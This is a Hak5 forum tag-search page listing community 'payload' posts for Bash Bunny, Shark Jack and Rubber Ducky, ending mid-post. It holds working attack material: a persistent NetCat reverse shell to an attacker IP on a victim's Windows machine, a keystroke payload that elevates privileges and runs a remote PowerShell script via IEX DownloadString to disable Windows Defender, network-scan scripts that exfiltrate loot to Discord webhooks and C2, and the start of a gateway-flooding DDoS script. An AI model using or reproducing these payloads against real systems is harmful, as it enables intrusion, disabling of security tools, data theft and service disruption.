Jump to content

Search the Community

Showing results for tags 'payload'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud CĀ²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Windows Persistent Reverse Shell for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. Targets Windows 10 (working on support for older versions) Connection can be closed and reconnected at any time Deploys in roughly 15-20 sec Works with NetCat Requirements Have a working Bash Bunny :) STATUS LED STATUS Purple Setup Amber (Single Blink) Installing and running scripts Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from WindowsPersistentReverseShell to either switch folder Edit the persistence.vbs file and replace ATTACKER_IP with attacker's IP and PORT with whichever port you like to use (I use 1337 ?) Save the persistence.vbs file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the persistence.vbs file on NetCat Run the command nc -nlvp 1337 (replace the port with the port in persistence.vbs) If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) Once a Windows cmd prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download
  2. Topic for discussions around Network reconnaissance payload for Shark Jack. Network reconnaissance payload for Shark Jack Swiss knife network reconnaissance payload with options for loot capturing (e.g. DIG, NMAP, IFCONFIG, ARP-SCAN, LLDP), notification (e.g. Homey, Pushover (the best push notfications service!), Slack), exfiltration (e.g. Cloud C2, Pastebin, Slack) and led blinking for IP address. Payload is based on various sample payloads from HAK5, MonsieurMarc, Topknot and others. The script has been created in a modular fashion which allows easy extending the script with new functions (e.g. recon, notification or exfiltration functions). The script furthermore incorporates logic to determine already existing loot folders and create a new (unique) loot folder every time the script is executed. Payload can be found here: https://github.com/hak5/sharkjack-payloads/tree/master/payloads/library/recon/Network-Recon-framework-payload-with-logging-notification-and-exfiltration
  3. Nmap Quickscan with Discord Integration (Cleaned & C2 Enabled) This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. The Payload waits for "Internet Connection" to be present. Once Internet Connection is found, It scans the local subnet for any online devices. - While also logging the Public IP of the Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.) payload.sh #!/bin/bash # Title: Nmap Quickscan w/ Discord Integration (Cleaned & C2 Enabled) # Author: REDD of Private-Locker # Version: 1.3 # # This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. # The Payload waits for "Internet Connection" to be present. Once Internet Connection is found, # It scans the local subnet for any online devices. - While also logging the Public IP of the # Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.) # # Magenta w/ Yellow ........Waiting for Internet # 1st Yellow flashing.......Scanning for Gateway/Subnet # Cyan flashing.............Running Nmap scan on x.0/24 # 2nd Yellow Flashing.......Installing dependencies for Discord Integration # Yellow....................Sent to Discord Webhook # Blue......................Exfiltrating to C2 # Red.......................Failed C2/EXFIL/Scanning # Green.....................Finished # Turn on Discord Integration (Yes = 1, No = 0) DISCORD=0 WEBHOOK='PLACE_DISCORD_WEBHOOK_HERE' # Send Loot as File or Plain Messages (File = 1, Messages = 0) AS_FILE=0 if [ -f "/etc/device.config" ]; then INITIALIZED=1 else INITIALIZED=0 fi LED SETUP NETMODE DHCP_CLIENT while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done URL="http://www.example.com" while ! wget $URL -qO /dev/null; do sleep 1; done GET_GATEWAY=$(route -n | grep 'UG[ \t]' | awk '{print $2}') while [ $GET_GATEWAY == "" ]; do sleep 1; done INTERNAL_IP=$(ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p') SUBNET=$(echo "$GET_GATEWAY" | awk -F"." '{print $1"."$2"."$3".0/24"}') CHK_SUB=$(echo $INTERNAL_IP | cut -d"." -f1-3) FIN_SUB="${CHK_SUB}.0/24" LED ATTACK; if [ "$SUBNET" != "$FIN_SUB" ]; then LED R FAST; sleep 2; LED R SOLID; else # Fix for Timestamp Update ntpd -gq; sleep 1; DATE_FORMAT=$(date '+%m-%d-%Y_%H:%M:%S') LOOT_DIR="/root/loot/nmap-diag" LOOT_FILE="$LOOT_DIR/diag-${DATE_FORMAT}.txt" if [ ! -d "$LOOT_DIR" ]; then mkdir -p "$LOOT_DIR" fi if [ ! -f "$LOOT_FILE" ]; then touch "$LOOT_FILE" fi # Get Public IP and run NMAP scan PUBLIC_IP=$(wget -q "http://api.ipify.org" -O -) printf "\n Public IP: ${PUBLIC_IP}\n Online Devices for ${SUBNET}:\n--------------------------------------------\n\n" >> "$LOOT_FILE" LED C VERYFAST run_nmap () { nmap -sn --privileged "$SUBNET" --exclude "$INTERNAL_IP" | awk '/Nmap scan report for/{printf " -> ";printf $5;}/MAC Address:/{print " - "substr($0, index($0,$3)) }' >> "$LOOT_FILE" } run_nmap & PID=$! while kill -0 "$PID" 2>&1 >/dev/null; do wait $PID done if [ -s "$LOOT_FILE" ]; then if [ "$DISCORD" == 1 ]; then CURL_CHK=$(which curl) if [ "$CURL_CHK" != "/usr/bin/curl" ]; then LED Y VERYFAST; opkg update;opkg install libcurl curl; fi LED Y SOLID if [ "$AS_FILE" == 1 ]; then FILE=\"$LOOT_FILE\" curl -s -i -H 'Content-Type: multipart/form-data' -F FILE=@$FILE -F 'payload_json={ "wait": true, "content": "Loot has arrived!", "username": "SharkJack" }' $WEBHOOK fi if [ "$AS_FILE" == 0 ]; then while read -r line; do DISCORD_MSG=\"**$line**\" curl -H "Content-Type: application/json" -X POST -d "{\"content\": $DISCORD_MSG}" $WEBHOOK done < "$LOOT_FILE" fi LED G SOLID;sleep 2; fi if [ "$INITIALIZED" == 1 ]; then LED Y SOLID if [ -z "$(pgrep cc-client)" ]; then C2CONNECT while ! pgrep cc-client; do LED B SOLID;sleep .2;LED G SOLID;sleep .8; done fi # Re-issuing C2CONNECT to verify loot push to C2 C2CONNECT sleep 2 C2EXFIL STRING "${LOOT_FILE}" "Nmap Diagnostic for Network ${SUBNET}" LED M VERYFAST; sleep 2; fi LED FINISH; else LED R SOLID; rm -rf "$LOOT_FILE"; fi fi
  4. My first payload, wanted to make something simple and cross-platform to try and learn the platform. Please give any feedback (I can't test on OSX myself) you may have to help me improve my payload writing! Features I'm looking to add that I need help with in a future version: - Loop so that the video opens multiple times before ending payload - Ability to crank up device volume while executing payload ######## INITIALIZATION ######## LED SETUP # Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET ATTACKMODE RNDIS_ETHERNET #ATTACKMODE ECM_ETHERNET ######## ATTACK PHASE (WINDOWS RUN PROMPT) ######## # Use this version if user cannot use CMD (lacking perms or something similar) LED ATTACK # Open run prompt Q GUI r Q DELAY 200 # Open web browser Q STRING microsoft-edge:// #Q STRING chrome Q ENTER Q DELAY 100 # Enter RickRoll link & enter it Q STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ Q ENTER ######## ATTACK PHASE (WINDOWS CMD) ######## #LED ATTACK # Open CMD #Q GUI r #Q DELAY 200 #Q STRING cmd #Q DELAY 100 #Q ENTER #Q DELAY 100 # Opens default web browser with video, cleans up cmd window #Q STRING start https://www.youtube.com/watch?v=dQw4w9WgXcQ && exit #Q ENTER ######## ATTACK PHASE OSX / *nix) ######## #LED ATTACK #Q GUI SPACE #Q DELAY 200 #Q STRING terminal #Q DELAY 100 #Q ENTER #Q DELAY 1000 #Q GUI n #Q DELAY 1000 #Q STRING open https://www.youtube.com/watch?v=dQw4w9WgXcQ && exit ######## FINISH ######## LED FINISH Github link: https://github.com/GlitchingGogo/BashBunny-SimpleRickRoll
  5. ok, so I'm new to this, but if I want to combine a couple of the payloads that's available at hak5 GitHub, can I for example make one payload that has wifi connect payload and the open ap Nmap my thought was to copy the payloads into a single payload and make the individual payload a function! Any tips or tricks would be nice! My goal is that if it connects to a specific network when it boots up, it will dump the loot to C2, but if it doesn't connect, it will automatically start the Open AP Nmap Scan this is what I have so far: ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- #!/bin/bash # This is a test to see if my network is in range, it will connect home and export the loot to C2 # if my network is out of range or can't connect to it, it will do the Open AP Attack! # Title: Simple WiFi Connection Example # Author: Hak5Darren # Version: 1.0 function Home() { # WiFi Client Setup WIFI_SSID="SSID" WIFI_PASS="Password" LED SETUP WIFI_CONNECT # optionally start SSH server # /etc/init.d/sshd start LED ATTACK C2CONNECT && C2EXFIL } function OpenAP() { # Title: Open AP Nmap Scanner # Author: Hak5Darren # Version: 1.0 # # Description: Scans for open access points, then connects to each and runs an Nmap scan saving logs to the loot folder # # LED SETUP: Scanning # LED ATTACK: Connected, running nmap scan # # See nmap --help for options. Default "-sP" ping scans the address space for fast host discovery. NMAP_OPTIONS="-sP" LOOT_DIR=/root/loot/open_ap_nmap_scan MAX_CIDR=20 DEBUG=1 function scan_wifi() { [[ $DEBUG == 1 ]] && echo Scanning for open access points | tee -a /tmp/payload.log iwlist wlan0 scan > /tmp/wifi_scan cat /tmp/wifi_scan | grep "Encryption key:off" -A1 | grep ESSID | sort | uniq | cut -c 28- | sed "s/.$//g" > /tmp/open total_aps=$(cat /tmp/open | wc -l) [[ $DEBUG == 1 ]] && echo Found "$total_aps" open access points | tee -a /tmp/payload.log } function check_ap() { current_ap=$(sed -n "$on"p /tmp/open) [[ $DEBUG == 1 ]] && echo "-------------------------------" | tee -a /tmp/payload.log current_ap_mac=$(cat /tmp/wifi_scan | grep "$current_ap" -B5 | grep Address | awk {'print $5'} | head -1) [[ $DEBUG == 1 ]] && echo Selected AP MAC: "$current_ap_mac" | tee -a /tmp/payload.log if grep -i -q "$current_ap_mac" /tmp/nmap_scanned; then [[ $DEBUG == 1 ]] && echo Skipping - Already scanned AP: "$current_ap" with MAC: "$current_ap_mac" | tee -a /tmp/payload.log else connect_wifi scan_network fi } function connect_wifi() { LED STAGE1 [[ $DEBUG == 1 ]] && echo Connecting to Open WiFi AP: "$current_ap" | tee -a /tmp/payload.log ifconfig wlan0 down iwconfig wlan0 mode Managed essid "$current_ap" ifconfig wlan0 up while(iwconfig wlan0 | grep Not-Associated); do sleep 1; done [[ $DEBUG == 1 ]] && echo "Connected to AP number $on with SSID $current_ap" | tee -a /tmp/payload.log udhcpc -i wlan0 while [ -z "$SUBNET" ]; do sleep 1 && find_subnet done APMAC=$(iw wlan0 link | grep Connected | awk {print'$3'}) [[ $DEBUG == 1 ]] && echo "AP MAC Address/BSSID: $APMAC" | tee -a /tmp/payload.log [[ $DEBUG == 1 ]] && iwconfig wlan0 | grep ESSID | tee -a /tmp/payload.log [[ $DEBUG == 1 ]] && ifconfig wlan0 | grep inet | tee -a /tmp/payload.log } function scan_network() { LED STAGE2 find_subnet [[ $DEBUG == 1 ]] && echo "Found Subnet: $SUBNET" | tee -a /tmp/payload.log CIDR=$(echo $SUBNET | cut -d '/' -f 2) [[ $DEBUG == 1 ]] && echo "CIDR: $CIDR" | tee -a /tmp/payload.log if [ "$CIDR" -ge "$MAX_CIDR" ] then [[ $DEBUG == 1 ]] && echo "Starting network scan" | tee -a /tmp/payload.log nmap $NMAP_OPTIONS $SUBNET -oN "$LOOT_DIR/$current_ap-$APMAC.txt" &>/dev/null else [[ $DEBUG == 1 ]] && echo "Network too large - skipping scan" | tee -a /tmp/payload.log fi echo $APMAC >> /tmp/nmap_scanned } function find_subnet() { SUBNET=$(ip addr | grep -i wlan0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//') [[ $DEBUG == 1 ]] && echo "Found subet for network $current_ap as $SUBNET" | tee -a /tmp/payload.log } function run() { while true; do setup scan_wifi while [ "$on" -le "$total_aps" ] do if [ "$on" -ge 1 ]; then check_ap; fi let on=on+1 done sleep 5 [[ $DEBUG == 1 ]] && echo Completed recon. Restarting... | tee -a /tmp/payload.log done } function setup() { LED SETUP mkdir -p $LOOT_DIR touch /tmp/nmap_scanned on=0 killall wpa_supplicant } # Run payload run } Home && poweroff || OpenAP
  6. Is it possible to make a rubber ducky open a new cmd window with admin privileges? (without the privileges yourself) (Please put the code in the comments if you can)
  7. Topic for discussions around Backup and Restore shell scripts for Shark Jack. Backup and Restore shell scripts for Shark Jack Being tired of having to re-image your Shark Jack and going through the hassle of backing up and restoring the device? These shell scripts will help you to backup and restore all important data on your Shark Jack. The scripts has been created in a modular fashion which allows easy extending the scripts with new functions. The backup script (backup.sh) incorporates logic to determine already existing backup folders and create a new (unique) backup folder every time the script is executed. Shell scripts can be found here: https://github.com/hak5/sharkjack-payloads/tree/master/payloads/library/util/Backup-and-Restore-scripts-with-logging-and-notification
  8. SharkLib - SharkJack Quick Payload Library This Tool was created less than 24 hours after having a "SharkJack", I realized how much of a pain it is to swap back and forth between prior loaded Payloads. So after 7 hours of debugging, testing, and pulling my hair out. - I give to you "SharkLib". SharkLib allows you to Backup/Restore prior loaded Payloads, via SSH Terminal. No more needing to have to "go deploy another script", you can easily use C2 or any SSH Terminal Service to switch your desired payloads. Features: Installs to Local System to allow ease of access of "SharkLib". (/usr/sbin) Syncs on Exit to prevent data corruption in payloads. Easy to use Menu Interface. Switch payloads in seconds with SSH. I will post the Code in here, until Hak5 tells me what "category" this tool falls under in the GitHub Repo. The Code: #!/bin/bash # # Title: SharkLib # Author: REDD of Private-Locker # Version: 1.3 # # This Script is to be ran on the Hak5 SharkJack itself. This Script # makes switching between local stored payloads quick and simple. # VERS=1.3 LIB_DIR="/root/payload/sharklib" DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )" START_DIR="$DIR" INSTALL_DIR="/usr/sbin" EXEC_FILE="sharklib" PAYLOAD_DIR="/root/payload" PAYLOAD_FILE="$PAYLOAD_DIR/payload.sh" function install_sharklib() { if [[ "$DIR" != $INSTALL_DIR ]]; then if [ ! -f "$INSTALL_DIR/$EXEC_FILE" ]; then printf " -> Installing SharkLib into System for Easy Access.\n" sleep 1; cp -rf $0 $INSTALL_DIR/$EXEC_FILE printf " -> Fixing Permissions of $EXEC_FILE in $INSTALL_DIR.\n" sleep 1; chmod +x $INSTALL_DIR/$EXEC_FILE fi fi } function view_payload() { printf "\n"; cat "$PAYLOAD_FILE"; printf "\n"; read -n 1 -s -r -p "Press any key to return to Menu.."; sharklib_menu; } function remove_sharklib() { if [ -f "$INSTALL_DIR/$EXEC_FILE" ]; then printf "\n" printf "Removing SharkLib from local system.\n" rm -rf "$INSTALL_DIR/$EXEC_FILE"; printf "Removing SharkLib Payload Library.\n" rm -rf "$LIB_DIR"; printf "SharkLib has been fully removed.\n\n" fi } function free_space() { FREE_MEM="$(df -h $PWD | awk '/[0-9]%/{print $(NF-2)}')" } function header() { free_space; printf "\n" printf "O========================================O\n" printf "| SharkLib - SharkJack Quick Payload |\n" printf "| Library |\n" printf "O=O====================================O=O\n" printf " | %-29s |\n" "$SHARKLIB_TITLE" printf " O====================================O\n" printf " | Free Space: %-6s Vers: %-3s | \n" "$FREE_MEM" "$VERS" printf " O================================O \n" printf " -Huge Thanks goes to Hak5! \n" printf "\n" } function backup_payload() { clear; SHARKLIB_TITLE=" Backup Payloads" header; if [ -f "$PAYLOAD_FILE" ]; then printf "\n" printf " 1. Backup current payload to SharkLib\n" printf "\n" printf " 2. Return to Previous Menu.\n" printf "\n" printf " Select a Menu Item by # and press ENTER: " read BACKUP_INPUT printf "\n" if [ "$BACKUP_INPUT" = "1" ]; then printf " What would you want to call this Payload?: " read BACKUP_INPUT_1 if [[ "$BACKUP_INPUT_1" != "" ]]; then if [ ! -d "$LIB_DIR/$BACKUP_INPUT_1" ]; then mkdir -p "$LIB_DIR/$BACKUP_INPUT_1" cp -rf "$PAYLOAD_FILE" "$LIB_DIR/$BACKUP_INPUT_1/payload.sh" printf " Created Payload directory named $BACKUP_INPUT_1\n" sleep 2; sharklib_menu; else printf " Removing Old Copy and using New Copy of $BACKUP_INPUT_1\n" rm -rf "$LIB_DIR/$BACKUP_INPUT_1" mkdir -p "$LIB_DIR/$BACKUP_INPUT_1" cp -rf "$PAYLOAD_FILE" "$LIB_DIR/$BACKUP_INPUT_1/payload.sh" sleep 2; sharklib_menu; fi else if [ ! -d "$LIB_DIR/Payload" ]; then printf " Backing up Payload into Default Payload directory..\n" mkdir -p "$LIB_DIR/Payload" cp -rf "$PAYLOAD_FILE" "$LIB_DIR/Payload/payload.sh" sleep 2; sharklib_menu; else printf " Removing Old Copy and using New Copy of $LIB_DIR/Payload\n" rm -rf "$LIB_DIR/Payload" mkdir -p "$LIB_DIR/Payload" cp -rf "$PAYLOAD_FILE" "$LIB_DIR/Payload/payload.sh" sleep 2; sharklib_menu; fi fi elif [ "$BACKUP_INPUT" = "2" ]; then sharklib_menu; else backup_payload; fi else printf " No Payload in $PAYLOAD_DIR.\n" fi } function delete_payload() { DELETE_INPUT=NULL clear; SHARKLIB_TITLE=" Delete Payloads" header; cd "$LIB_DIR" DIR_CNT="NULL" DIR_CNT=$(ls "$LIB_DIR" | grep -v total | wc -l) declare -a DIRS i=1 for d in */; do DIRS[i++]="${d%/}" done if [ "$DIR_CNT" -lt "1" ]; then printf " There are no Payloads to Delete. \n\n" printf " Returning to Previous Menu.\n" sleep 2; sharklib_menu; fi printf " There are ${#DIRS[@]} Payloads in SharkLib:\n" for((i=1;i<=${#DIRS[@]};i++)); do printf " %2d. %-20s\n" "$i" "${DIRS[i]}" done PAYLOAD_TOTAL=${#DIRS[@]} PLUS_QUIT=$((PAYLOAD_TOTAL+1)) printf "\n" printf " %2d. %-20s\n" "$PLUS_QUIT" "Return to Previous Menu." printf "\n" printf " Please choose a Payload by Number: " read DELETE_INPUT printf "\n" if [[ "$DELETE_INPUT" == "$PLUS_QUIT" ]]; then printf " Returning to Previous Menu.\n" sleep 2; sharklib_menu; elif [[ "$DELETE_INPUT" == "" ]]; then printf " Please Input a choice.\n" sleep 2; delete_payload; elif ! [[ "$DELETE_INPUT" =~ ^[0-9]+$ ]]; then printf " Please Input a choice.\n" sleep 2; delete_payload; elif [[ "$DELETE_INPUT" == "0" ]]; then printf " Please Input a choice.\n" sleep 2; delete_payload; elif [[ "$DELETE_INPUT" -gt "$PLUS_QUIT" ]]; then printf " Please Input a choice.\n" sleep 2; delete_payload; elif [[ "$DELETE_INPUT" -le "$PLUS_QUIT" ]]; then printf " Deleting payload ${DIRS[$DELETE_INPUT]} from SharkJack. \n" rm -rf "$LIB_DIR/${DIRS[$DELETE_INPUT]}" cd "$START_DIR" sleep 2; sharklib_menu; else printf " Wrong Choice, going back to Previous Menu.\n" cd "$START_DIR" sleep 2; sharklib_menu; fi } function restore_payload() { LOAD_INPUT=NULL clear; SHARKLIB_TITLE=" Restore Payloads" header; cd "$LIB_DIR" DIR_CNT=$(ls "$LIB_DIR" | grep -v total | wc -l) declare -a DIRS i=1 for d in */; do DIRS[i++]="${d%/}" done if [ "$DIR_CNT" -lt "1" ]; then printf " There are no Payloads to Restore. \n\n" printf " Returning to Previous Menu.\n" sleep 2; sharklib_menu; fi printf " There are ${#DIRS[@]} Payloads in SharkLib:\n" for((i=1;i<=${#DIRS[@]};i++)); do printf " %2d. %-20s\n" "$i" "${DIRS[i]}" done PAYLOAD_TOTAL=${#DIRS[@]} PLUS_QUIT=$((PAYLOAD_TOTAL+1)) printf "\n" printf " %2d. %-20s\n" "$PLUS_QUIT" "Return to Previous Menu." printf "\n" printf " Please choose a Payload by Number: " read LOAD_INPUT printf "\n" if [[ "$LOAD_INPUT" == "$PLUS_QUIT" ]]; then printf " Returning to Previous Menu.\n" sleep 2; sharklib_menu; elif [[ "$LOAD_INPUT" == "" ]]; then printf " Please Input a choice.\n" sleep 2; restore_payload; elif ! [[ "$LOAD_INPUT" =~ ^[0-9]+$ ]]; then printf " Please Input a choice.\n" sleep 2; restore_payload; elif [[ "$LOAD_INPUT" == "0" ]]; then printf " Please Input a choice.\n" sleep 2; restore_payload; elif [[ "$LOAD_INPUT" -gt "$PLUS_QUIT" ]]; then printf " Please Input a choice.\n" sleep 2; restore_payload; elif [[ "$LOAD_INPUT" -le "$PLUS_QUIT" ]]; then printf " Loading payload ${DIRS[$LOAD_INPUT]} to SharkJack. \n" cp -rf "$LIB_DIR/${DIRS[$LOAD_INPUT]}/payload.sh" "$PAYLOAD_FILE" cd "$START_DIR" sleep 2; sharklib_menu; else printf " Wrong Choice, going back to Previous Menu.\n" cd "$START_DIR" sleep 2; sharklib_menu; fi } function cleanup_ctrl { echo -en "\n -> Caught SIGINT! \n" printf " -> Cleaning up and Exiting..\n\n" sync sleep 1; exit $? } function exit_sharklib() { printf " -> Cleaning up and Exiting..\n\n" sync sleep 1; exit 0; } function sharklib_menu() { clear; trap cleanup_ctrl SIGINT trap cleanup_ctrl SIGTERM MENU_INPUT=NULL if [ ! -d "$LIB_DIR" ]; then printf " -> Creating SharkLib Payload Library directory.\n" mkdir -p "$LIB_DIR" fi cd "$LIB_DIR" SHARKLIB_TITLE=" By REDD" header; printf " 1. Backup Payload to SharkLib\n" printf " 2. Restore Payload from SharkLib\n" printf " 3. Delete Payload from SharkLib\n" printf "\n" printf " 4. View Current Payload on SharkJack\n" printf "\n" printf " 5. Exit\n" printf "\n" printf " Select a Menu Item by # and press ENTER: " read MENU_INPUT printf "\n" if ! [[ "$MENU_INPUT" =~ ^[0-9]+$ ]]; then sharklib_menu; elif [[ "$MENU_INPUT" = "0" ]]; then sharklib_menu; elif [[ "$MENU_INPUT" = "1" ]]; then backup_payload; elif [[ "$MENU_INPUT" = "2" ]]; then restore_payload; elif [[ "$MENU_INPUT" = "3" ]]; then delete_payload; elif [[ "$MENU_INPUT" = "4" ]]; then view_payload; elif [[ "$MENU_INPUT" = "5" ]]; then exit_sharklib; elif [[ "$MENU_INPUT" -ge "6" ]]; then sharklib_menu; elif [[ "$MENU_INPUT" == "" ]]; then sharklib_menu; else sharklib_menu; fi } if [ "$1" == "--install" ]; then install_sharklib; exit 0; elif [ "$1" == "--remove" ]; then remove_sharklib; else install_sharklib; sharklib_menu; fi Suggestions are always welcome! Huge Thanks to Hak5 for the wonderful gear! REDD (Ar1k88)
  9. GIve-Me-My-iP (GIMMP) This payload is used to force the SharkJack on to Static LAN's. Main Scenario - DHCP is disabled or not present on the LAN, only Static IP Devices. The Payload uses ARP-Scan to scan a Array of Subnets to determine if ANY devices are on those subnets. - If so connect to the last known network with devices and set the IP of the SharkJack to the Subnet and Last Digits you assign in the payload. Enjoy. NOTE: This payload requires the Router/LAN to have ARP Scanning enabled. Some Routers/LAN's do not have this feature enabled. The Code: #!/bin/bash # # Title: GIve-Me-My-iP! (GIMMP) # Author: REDD of Private-Locker # Version: 1.0 # # Description: This payload will determine if DHCP is enabled # on the LAN. - If not, it will scan a List of Common Network # Subnets for any Static IP Devices using ARP-scan. Once a valid # IP is found. It will set the SharkJack to the subnet of the last # detected Network in the log file with the ending IP digits. # # LED SETUP (Magenta) - Setting up Variables and enviroment # LED Yellow thru Magenta - Waiting to be plugged in # LED Cyan thru Magenta - Scanning Subnets for Static IP Devices # LED Green Blinking - DHCP found # LED Green SOLID - IP Address found and set to SharkJack # LED Red SOLID - Payload failed, No IP addresses detected # LED FINISH (Green) - Payload completed # # Ending IP digits of the SharkJack. SET_IP="250" # Source IP that the ARP-Scan will come from. FAKE_SRC="192.168.133.7" # Packet Rate for ARP-Scan. BANDWIDTH="100000" # Temp log file for output of script. TMP_LOG="temp.log" # Determine if SharkJack gets IP. while ! ifconfig eth0; do LED M SOLID;sleep .8;LED Y SOLID;sleep .2; done NETMODE DHCP_CLIENT; LED M SOLID; sleep 5; IP="$(ip route list dev eth0 | awk ' /^default/ {print $3}')" # Verify variable to compare SharkJack IP. VERIFY="^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$" function cleanup() { if [ -f "$TMP_LOG" ]; then rm -rf $TMP_LOG; fi } function scan_networks() { NETWORKS=( '192.168.0.0/24' '192.168.1.0/24' '192.168.2.0/24' '192.168.10.0/24' '192.168.100.0/24' '172.16.0.0/24' '172.16.1.0/24' '172.16.2.0/24' '172.16.10.0/24' '172.16.24.0/24' '10.0.0.0/24' '10.0.1.0/24' '10.0.2.0/24' '10.0.10.0/24' '10.10.0.0/24' '10.10.1.0/24' '10.10.2.0/24' '10.10.10.0/24' '10.100.0.0/24' '10.100.1.0/24' '10.100.2.0/24' '10.100.10.0/24' ) for i in "${NETWORKS[@]}"; do LED M SOLID; arp-scan --arpspa $FAKE_SRC -g -B $BANDWIDTH -I eth0 ${i} >> $TMP_LOG LED Y SOLID; sleep .2; done LED M FAST; LAST_IP=$(grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" $TMP_LOG | tail -1 | cut -d"." -f1-3) if [ "$LAST_IP" != "" ]; then SHARKJACK_IP="${LASTIP}.${SET_IP}" ifconfig eth0 ${SHARKJACK_IP}/24 up CURRENT_SUBNET="${LAST_IP}" CURRENT_GW=$(ip route list dev eth0 | awk ' /^default/ {print $3}') LED G SOLID; else # If no LAN detected, exit. LED R SOLID; exit 1; fi } # Start the script. If Valid IP, continue script. - If not lets scan some networks! if [ -f "$TMP_LOG" ]; then rm -rf $TMP_LOG; else touch $TMP_LOG; fi if [[ "$IP" =~ $VERIFY ]]; then # Gateway found. Continuing script. LED G FAST; sleep 1; elif [ -z "$IP" ]; then # No Gateway found (Blank Gateway Variable) NETMODE TRANSPARENT; scan_networks; elif [ "$IP" == "172.16.24.1" ]; then # Added to detect if the SharkJack remains on the current Arming Mode IP. NETMODE TRANSPARENT; scan_networks; else # Exiting with exit code 1. LED R SOLID; exit 1; fi # Final Cleanup. cleanup; # Run your SCAN's here.. OR ... if you have Internet Tester Payload backed up in SharkLib LED FINISH SHARKLIB="/root/payload/sharklib" PAYLOAD="${SHARKLIB}/'Internet Tester'/payload.sh" if [ -d "$SHARKLIB" ]; then source $PAYLOAD; fi Changelog: 1.1 - Initial Release
  10. DisableD3f3nd3r This payload was created out of frustration of people asking how to disable Windows Defender via BashBunny, Rubber-Ducky. I have released payloads for both devices. This is just a basic Powershell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender". Source Code of the Powershell Script: https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc The Payload: #!/bin/bash # # Title: Disable D3f3nd3r (BashBunny) # Description: This Payload disables Windows Defender using Powershell, Works also for the Hak5 # Rubber Ducky or any HID device that supports Quacking. # Author: REDD of Private-Locker # Version: 1.0 # Category: Disable Security # Target: Windows # # Source: https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1 # LED SETUP ATTACKMODE HID LED ATTACK RUN WIN "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\"" Q LEFTARROW; Q ENTER; Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\"" Q ENTER; sleep 1; Q STRING "exit"; Q ENTER; LED FINISH
  11. Flood Gateway (DDoS) This Payload was created to have a automated way to stress test a Router/Gateway at any given moment. Currently it can use SYN/ACK/RST/UDP/BlackNurse/XMAS and SlowLoris Attacks. This potentially DDoS's the connected Gateway to determine if the Router/Gateway can handle being attacked internally. (And other reasons.... šŸ˜‰) The Code: #!/bin/bash # # Title: Flood Gateway (DDoS) # Author: REDD of Private-Locker # Version: 1.2 # # Description: This payload detects the Gateway IP then proceeds to # flood the Gateway IP by sending SYN/ACK/RST/UDP Packets or using # SLOWLORIS/BlackNurse/XMAS Attacks. (More options to come) # # Common Ports to Attack: 80 (TCP), 8080(TCP), 53 (UDP), 3389 (TCP), the # rest is up to you. # # Defaults to SYN Attack. # # LED SETUP (Magenta) Setting NETMODE and detecting GW IP. # LED Yellow thru Magenta Waiting Ethernet Plug connection. # LED White thru Magenta Waiting Connection to Public Website. # LED Red Blink No Gateway IP Address, waiting 15 seconds. # LED Red Solid No Gateway IP Address, exiting script. # LED Cyan Blink to Solid Connected to C2. (Optional) # LED Yellow thru Green Attacking Gateway IP with Hping3. # LED Green Solid 